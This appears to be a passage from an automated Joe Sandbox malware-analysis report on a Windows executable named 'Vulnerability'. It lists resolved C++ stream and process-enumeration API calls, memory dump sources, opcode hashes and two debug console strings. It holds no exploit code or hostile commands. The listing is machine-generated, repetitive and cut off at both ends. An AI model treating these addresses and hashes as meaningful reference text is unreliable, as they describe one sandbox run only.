                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$_invalid_parameter_noinfo_noreturn$memset$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?read@?$basic_istream@?seekg@?$basic_istream@?setstate@?$basic_ios@?tellg@?$basic_istream@Bios_base@std@@Concurrency::cancel_current_taskD@std@@@1@_Init@?$basic_streambuf@Mbstatet@@@2@V12@V12@_V?$basic_streambuf@V?$fpos@malloc
                                                                                          • String ID:
                                                                                          • API String ID: 853152473-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A839
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A859
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A869
                                                                                          • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A894
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF7CC41CB1D
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF7CC41CB37
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF7CC41CB69
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF7CC41CB94
                                                                                            • Part of subcall function 00007FF7CC41CAF0: std::_Facet_Register.LIBCPMT ref: 00007FF7CC41CBAD
                                                                                            • Part of subcall function 00007FF7CC41CAF0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF7CC41CBCC
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A906
                                                                                          • ?widen@?$ctype@_W@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7CC41A94E
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A95C
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A9E6
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A9ED
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A9FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7CC41A4E1
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A506
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41D5FB
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41D61B
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41D62B
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41D678
                                                                                          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7CC41D6A6
                                                                                          • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41D6C7
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41D70E
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41D715
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41D722

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetShellWindow.USER32 ref: 00007FF7CC4215AB
                                                                                          • GetWindowThreadProcessId.USER32 ref: 00007FF7CC4215B9
                                                                                            • Part of subcall function 00007FF7CC4214C0: GetCurrentProcessId.KERNEL32 ref: 00007FF7CC4214E6
                                                                                            • Part of subcall function 00007FF7CC4214C0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7CC4214F3
                                                                                            • Part of subcall function 00007FF7CC4214C0: memset.VCRUNTIME140 ref: 00007FF7CC421514
                                                                                            • Part of subcall function 00007FF7CC4214C0: Process32FirstW.KERNEL32 ref: 00007FF7CC421529
                                                                                            • Part of subcall function 00007FF7CC4214C0: Process32NextW.KERNEL32 ref: 00007FF7CC421541
                                                                                            • Part of subcall function 00007FF7CC4214C0: CloseHandle.KERNEL32 ref: 00007FF7CC42155A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4215E7
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC42160A
                                                                                          • ?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC421617
                                                                                          Strings
                                                                                          • String ID: [+] Pausing to allow for debugging$[+] Press enter to close

                                                                                          Control-flow Graph

                                                                                          APIs

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF7CC41A1AA
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A1C7
                                                                                          • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7CC41A1F0
                                                                                          • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A23B
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7CD
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7E7
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C819
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C844
                                                                                            • Part of subcall function 00007FF7CC41C7A0: std::_Facet_Register.LIBCPMT ref: 00007FF7CC41C85D
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C87C
                                                                                          • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A250
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A267

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7CC419FEA
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A007
                                                                                          • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7CC41A030
                                                                                          • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A07B
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7CD
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7E7
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C819
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C844
                                                                                            • Part of subcall function 00007FF7CC41C7A0: std::_Facet_Register.LIBCPMT ref: 00007FF7CC41C85D
                                                                                            • Part of subcall function 00007FF7CC41C7A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C87C
                                                                                          • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A090
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A0A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                          • String ID:
                                                                                          • API String ID: 3911317180-0
                                                                                          • Opcode ID: f95377b0793453415ea5f2f5c81a2309527505f0e92931372e17918f4aaa2e9c
                                                                                          • Instruction ID: e215ecf1ffb90bcc85782aadba9d18059fddc33e8f33a559122f465dd40b9a2f
                                                                                          • Opcode Fuzzy Hash: f95377b0793453415ea5f2f5c81a2309527505f0e92931372e17918f4aaa2e9c
                                                                                          • Instruction Fuzzy Hash: D0319C32619B8586EB50AF25A800369BBE4FB88FA8F548035DE8D07B58DF3CD144C710

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4197CC
                                                                                          • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC4197EB
                                                                                          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC41981D
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC419838
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC419883
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                                                          • String ID:
                                                                                          • API String ID: 1184074665-0
                                                                                          • Opcode ID: e6428d08daa05c0431e2d938a8ad9b90a068d51e3d7a087df42541e2e422740f
                                                                                          • Instruction ID: fdbdb93df42444401cd4dfe0e0e6274ff9d4f5382cd1d7a0741cd3177521d711
                                                                                          • Opcode Fuzzy Hash: e6428d08daa05c0431e2d938a8ad9b90a068d51e3d7a087df42541e2e422740f
                                                                                          • Instruction Fuzzy Hash: 4A316932A06BC286EB109F29EA94729BBA0FB85FADF44C135CA4D43714DF38D265C750

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4189F3
                                                                                          • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC418A12
                                                                                          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC418A44
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC418A5F
                                                                                            • Part of subcall function 00007FF7CC419FB0: ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7CC419FEA
                                                                                            • Part of subcall function 00007FF7CC419FB0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC41A007
                                                                                            • Part of subcall function 00007FF7CC419FB0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7CC41A030
                                                                                            • Part of subcall function 00007FF7CC419FB0: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A07B
                                                                                            • Part of subcall function 00007FF7CC419FB0: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A090
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC418AA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
                                                                                          • String ID:
                                                                                          • API String ID: 219286276-0
                                                                                          • Opcode ID: c3793b0fa0212af6cdd69fd4f1ae6388802a687580cf31eddb082c1ca09b4694
                                                                                          • Instruction ID: 08f44eeee8ccc85c9e3763a690b22ff59b75f977285f93b5bd7959b25ae2db9a
                                                                                          • Opcode Fuzzy Hash: c3793b0fa0212af6cdd69fd4f1ae6388802a687580cf31eddb082c1ca09b4694
                                                                                          • Instruction Fuzzy Hash: 12211732608B8186EB109F29F85436ABBA4FB89B99F94C135DA8D43725DF3DD205CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7c404c1a1bba81196f57576af691f4329f7fd379a4ccbe15ce8d1330266ce23
                                                                                          • Instruction ID: 3433db9ee64b864271c18d4c31355034554509b63b53a6d381d5b1deaf5f9b08
                                                                                          • Opcode Fuzzy Hash: e7c404c1a1bba81196f57576af691f4329f7fd379a4ccbe15ce8d1330266ce23
                                                                                          • Instruction Fuzzy Hash: B231A436704A8286EE659F26E4043B9EBA1FB44BE8F988035CF8D47751DE3DE586C310
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize_configthreadlocale_initialize_onexit_table_initialize_wide_environment
                                                                                          • String ID:
                                                                                          • API String ID: 2955177221-0
                                                                                          • Opcode ID: 43b1fc390244c3511705dfa8a3e9e35ad4ae1c78bbaf5e80ff61b34d442b4d0f
                                                                                          • Instruction ID: f547ba24df6a305b426097e42ac8908fb9863e794c460ad604ca8c835033b169
                                                                                          • Opcode Fuzzy Hash: 43b1fc390244c3511705dfa8a3e9e35ad4ae1c78bbaf5e80ff61b34d442b4d0f
                                                                                          • Instruction Fuzzy Hash: 0A1199A1E182C306FA697FB654172B89D81DF90368FC6E434E51E46EC3ED2CAA454632
                                                                                          APIs
                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC424138
                                                                                            • Part of subcall function 00007FF7CC424B1C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CC424B25
                                                                                            • Part of subcall function 00007FF7CC424B1C: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF7CC42413D,?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43), ref: 00007FF7CC424B36
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC42413E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
                                                                                          • String ID:
                                                                                          • API String ID: 594857686-0
                                                                                          • Opcode ID: 47bd4ed3095be75780f1d8431e270a3ae190829c7a451f3961b14f3cea497438
                                                                                          • Instruction ID: a4921f8028bc7c681fe774bf1de67407da168f3d16f91c47e22991cecc44bb33
                                                                                          • Opcode Fuzzy Hash: 47bd4ed3095be75780f1d8431e270a3ae190829c7a451f3961b14f3cea497438
                                                                                          • Instruction Fuzzy Hash: E2E0EC80E0928B55FD697A61280B1B4DC408F68779EA8B730DABD49ECBAD1CA6525630
                                                                                          APIs
                                                                                          • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7CC41A5B5
                                                                                          • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF7CC41A5C1
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A5CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
                                                                                          • String ID:
                                                                                          • API String ID: 2094784882-0
                                                                                          • Opcode ID: 26560ff4dc348fa32aa4d0b96a9c05765b84153fff5ca5dbd198ed44ddb469cd
                                                                                          • Instruction ID: f36d1b2d7a22e4e5ad46e3ccca99e1ae90fa76174f0664d8689f2bb54cee6c9b
                                                                                          • Opcode Fuzzy Hash: 26560ff4dc348fa32aa4d0b96a9c05765b84153fff5ca5dbd198ed44ddb469cd
                                                                                          • Instruction Fuzzy Hash: 1BD05E14B84B9682DE08AF26B8951785720EF8DFAAB4CE030CD0FC7311CE3CE1958324
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: _fseeki64fgetpos
                                                                                          • String ID:
                                                                                          • API String ID: 3401907645-0
                                                                                          • Opcode ID: b83ac07ecf1b7c532eeed7c3122e0da24c9e69cfce4552c536ea2858b50140ec
                                                                                          • Instruction ID: 47f022c022e0604e10c9cf22a5ca7231126162a9929c9099c9d34004878a59e4
                                                                                          • Opcode Fuzzy Hash: b83ac07ecf1b7c532eeed7c3122e0da24c9e69cfce4552c536ea2858b50140ec
                                                                                          • Instruction Fuzzy Hash: 53319132614B8181EB609F15E5443A8B7A1FB54FBCFA58131CE8C877A4DF38D592C310
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
